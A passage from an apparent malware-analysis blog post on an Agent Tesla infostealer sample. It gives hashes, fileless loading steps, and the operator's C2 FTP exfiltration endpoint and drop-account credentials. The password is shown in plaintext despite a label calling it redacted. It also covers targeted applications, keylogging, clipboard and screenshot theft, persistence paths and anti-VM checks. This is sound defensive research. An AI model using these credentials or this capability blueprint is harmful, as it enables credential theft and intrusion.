                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				Compression                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				Applied before encryption                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-322'>
table#wpdtSimpleTable-322{ table-layout: fixed !important; }
table#wpdtSimpleTable-322 td, table.wpdtSimpleTable322 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p>At runtime, the loader decrypts the blob using the hardcoded key and embedded IV, decompresses the result with <em>DeflateStream</em>, then uses <em>Assembly.Load()</em> to instantiate Agent Tesla directly from the resulting byte array in memory. <strong>No file is written to disk at any stage from this point forward</strong> — the execution is entirely fileless.</p>



<h3 class="wp-block-heading">3. Payload Analysis: Agent Tesla Unpacked</h3>



<p>Memory dumps captured during sandbox execution allowed recovery of the <strong>fully decrypted Agent Tesla payload</strong> — the binary that runs inside the hollowed <em>aspnet_compiler.exe</em> process. Static analysis of this dump (270,336 bytes, SHA256: 43d09743a69c9afa7156bf4e2bf7423b3d5f5ad7d54c4c3fb8a698d526778057) reveals the complete capability set and hardcoded configuration of this Agent Tesla instance.</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-323"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="7"
           data-wpID="323"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:56.152125279642%;                    padding:10px;
                    "
                    >
                                        				Value                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:12.192393736018%;                    padding:10px;
                    "
                    >
                                        				Field                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:31.65548098434%;                    padding:10px;
                    "
                    >
                                        				Notes                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				270,336 bytes                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Size                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Full unpacked .NET assembly                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				43d09743a69c9afa7156bf4e2bf7423b3d5f5ad7d54c4c3fb8a698d526778057                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				SHA256                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Decrypted payload in memory                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				78ba57f4a164bedc26204296ea09bb8f                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				MD5                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				Decrypted payload                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				2024-04-23 20:27 UTC                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				PE Timestamp                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Compile				date -  not forged in this stage                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				PE32 .NET EXE (GUI)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Format                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				x86, CLR, 3 sections                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				4.64 / 8.0                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Entropy                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Low - 				plaintext IL, no remaining encryption                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-323'>
table#wpdtSimpleTable-323{ table-layout: fixed !important; }
table#wpdtSimpleTable-323 td, table.wpdtSimpleTable323 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h4 class="wp-block-heading"><br>Hardcoded Configuration</h4>



<p>With the payload decrypted, the <strong>complete operator configuration is visible in plaintext</strong> — the same values that were hidden behind AES-256 in the loader stage:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-324"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="9"
           data-wpID="324"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:40.579710144928%;                    padding:10px;
                    "
                    >
                                        				Value                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:17.523056653491%;                    padding:10px;
                    "
                    >
                                        				Field                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:41.897233201581%;                    padding:10px;
                    "
                    >
                                        				Notes                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				ftp://ftp.horeca-bucuresti.ro                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				FTP URL                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				C2 exfiltration endpoint - 				hardcoded                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				americas2@horeca-bucuresti.ro                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				FTP Username                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Operator drop account - 				hardcoded                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				H*TE9iL;x61m                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				FTP Password                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				[REDACTED				in publication] -  plaintext in payload                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				http://ip-api.com/line/?fields=hosting                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Fingerprint URL                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Pre-exfil				hosting check -  hardcoded                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				roSkM / roSkM.exe                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Mutex / EXE name                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Campaign instance				identifier                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				hdfzpysvpzimorhk                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Secondary mutex                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Anti-re-infection mutex                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				HnJnO                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				Campaign tag                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        				Instance/build identifier                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				7bcd610d-7af6-4dc2-875b-dc4fec91463c.exe                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				Persistence name                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        				GUID				filename used for autorun copy                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-324'>
table#wpdtSimpleTable-324{ table-layout: fixed !important; }
table#wpdtSimpleTable-324 td, table.wpdtSimpleTable324 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<p><br>The FTP password recovered from the memory dump matches exactly the credentials captured in cleartext by ANY.RUN during the dynamic analysis phase, providing cross-validation between static payload analysis and live network capture.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="718" height="553" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image3.png" alt="" class="wp-image-20894" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image3.png 718w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image3-300x231.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image3-370x285.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image3-270x208.png 270w" sizes="(max-width: 718px) 100vw, 718px" /><figcaption class="wp-element-caption">Exfiltrated password in the sandbox analysis</figcaption></figure>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="927" height="367" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image4.png" alt="" class="wp-image-20897" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image4.png 927w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image4-300x119.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image4-768x304.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image4-370x146.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image4-270x107.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image4-740x293.png 740w" sizes="(max-width: 927px) 100vw, 927px" /><figcaption class="wp-element-caption">Exfiltrated data in payload analysis</figcaption></figure>



<h4 class="wp-block-heading"><br>Credential Theft Capabilities</h4>



<p>The unpacked payload targets <strong>over 80 applications</strong> across six categories, representing one of the broadest credential theft surface areas among commodity stealers:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-325"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="7"
           data-wpID="325"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000013"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:7.9497907949791%;                    padding:10px;
                    "
                    >
                                        				Category                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000013"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:79.31858936043%;                    padding:10px;
                    "
                    >
                                        				Applications                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000013"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:12.731619844591%;                    padding:10px;
                    "
                    >
                                        				Method                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Browsers (28+)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000010"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Chrome, Firefox, Edge, Brave, 
Opera, Vivaldi, Yandex, 360Chrome, 
IceDragon, Waterfox, PaleMoon, SeaMonkey, 
QQ Browser, Coccoc, Comodo Dragon, 
Epic Privacy, Citrio, Amigo, Orbitum, 
Sputnik, CentBrowser, Chedot, 7Star, Torch, 
Elements, UC Browser, BlackHawk, Iridium                    </td>
                                                <td class="wpdt-cell wpdt-fs-000011"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Profile				dirs + SQLite Login Data                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Email clients (21+)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000010"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Outlook				(2003–19), Thunderbird, Foxmail, Mailbird, The Bat!, Postbox,				IncrediMail, Eudora, Becky!, ClawsMail, PocoMail, SeaMonkey Mail,				Opera Mail, Falkon, Flock, K-Meleon, IceCat, PaleMoon, eM Client,				Windows Mail App, Trillian                    </td>
                                                <td class="wpdt-cell wpdt-fs-000011"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Registry + profile files                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				FTP clients (9)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000010"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				FileZilla,				WinSCP, CoreFTP, FTPGetter, SmartFTP, FTP Navigator, WS_FTP,				FtpCommander, FlashFXP                    </td>
                                                <td class="wpdt-cell wpdt-fs-000011"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				Config files + registry                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				VPN clients (5)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000010"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				NordVPN,				OpenVPN, Private Internet Access, DynDNS, Paltalk                    </td>
                                                <td class="wpdt-cell wpdt-fs-000011"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        				Config + credential files                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				VNC servers (13)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000010"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				RealVNC 3.x/4.x, TightVNC				(ControlPassword), TigerVNC, UltraVNC                    </td>
                                                <td class="wpdt-cell wpdt-fs-000011"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        				Registry keys                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000011"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Messaging (8+)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000010"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Discord				(OAuth token via regex), Pidgin, Trillian, Psi/Psi+, Paltalk,				JDownloader 2.0, MysqlWorkbench                    </td>
                                                <td class="wpdt-cell wpdt-fs-000011"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        				Profile + config files                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-325'>
table#wpdtSimpleTable-325{ table-layout: fixed !important; }
table#wpdtSimpleTable-325 td, table.wpdtSimpleTable325 th { white-space: normal !important; }
.wpdt-fs-000013 { font-size: 13px !important;}
.wpdt-fs-000011 { font-size: 11px !important;}
.wpdt-fs-000010 { font-size: 10px !important;}
</style>




<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="934" height="458" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-1.png" alt="" class="wp-image-20907" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-1.png 934w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-1-300x147.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-1-768x377.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-1-370x181.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-1-270x132.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image5-1-740x363.png 740w" sizes="(max-width: 934px) 100vw, 934px" /><figcaption class="wp-element-caption">Apps targeted by Agent Tesla</figcaption></figure>



<h4 class="wp-block-heading">Keylogger</h4>



<p>The payload implements a full <strong>system-wide keylogger</strong> via Windows hook APIs. 26 special keys are mapped to labeled tokens for inclusion in keylog reports:</p>



<pre class="wp-block-code"><code>{ALT+F4}  {ALT+TAB}  {BACK}  {CAPSLOCK}  {CTRL}  {DEL}
{END}  {ENTER}  {ESC}  {F10}  {F11}  {F12}
{HOME}  {Insert}  {KEYDOWN}  {KEYLEFT}  {KEYRIGHT}  {KEYUP}
{NumLock}  {PageDown}  {PageUp}  {TAB}  {Win}
 
Keylogger interval: configurable via KeyloggerInterval field
Output field:       KeylogText (appended per session)</code></pre>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="159" height="512" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7-1.png" alt="" class="wp-image-20913" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7-1.png 159w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image7-1-93x300.png 93w" sizes="(max-width: 159px) 100vw, 159px" /></figure></div>


<h4 class="wp-block-heading">Additional Capabilities</h4>



<p><strong><em>Clipboard Monitoring</em></strong><br>Agent Tesla registers a <em>SetClipboardViewer / ChangeClipboardChain</em> hook to intercept clipboard content in real time. Captured data is tagged with <em>&lt;br&gt;&lt;hr&gt;Copied Text: &lt;br&gt;</em>and appended to the exfiltration report. This is particularly effective for capturing copied passwords, API keys, and cryptocurrency wallet addresses.</p>



<p><em><strong>Screenshot Capture</strong></em><br>A configurable screenshot module captures periodic desktop images. The interval is controlled by the <em>KeyloggerInterval</em> setting. Screenshots are base64-encoded and included in the HTML exfiltration report alongside stolen credentials.</p>



<p><em><strong>Persistence Mechanisms</strong></em></p>



<p>The payload supports multiple persistence methods, selectable at build time:</p>



<ul class="wp-block-list">
<li><strong>Registry Run key</strong> — HKCU\Software\Microsoft\Windows\CurrentVersion\Run[StartupRegName];</li>



<li><strong>Startup folder</strong> — copies itself to %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\ ;</li>



<li><strong>Task Scheduler</strong> — creates a scheduled task for persistence without registry artifacts;</li>



<li><strong>GUID-named copy</strong> — drops as 7bcd610d-7af6-4dc2-875b-dc4fec91463c.exe to blend with system files.</li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="619" height="134" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image8.png" alt="" class="wp-image-20918" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image8.png 619w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image8-300x65.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image8-370x80.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/05/image8-270x58.png 270w" sizes="(max-width: 619px) 100vw, 619px" /><figcaption class="wp-element-caption">Other evasion methods</figcaption></figure></div>


<p><em><strong>Anti-Analysis / Anti-VM</strong></em></p>



<p>The payload performs environment checks before proceeding, scanning for indicators of analysis environments:</p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-326"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="6"
           data-wpID="326"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.092224231465%;                    padding:10px;
                    "
                    >
                                        				Indicator                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:26.582278481013%;                    padding:10px;
                    "
                    >
                                        				Method                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:40.325497287523%;                    padding:10px;
                    "
                    >
                                        				Target                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				VMware / vmware                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				Process/file check                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        				VMware guest detection                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				VirtualBox                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				Registry/file check                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        				VirtualBox guest detection                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				SbieDll.dll                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        				DLL presence check                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
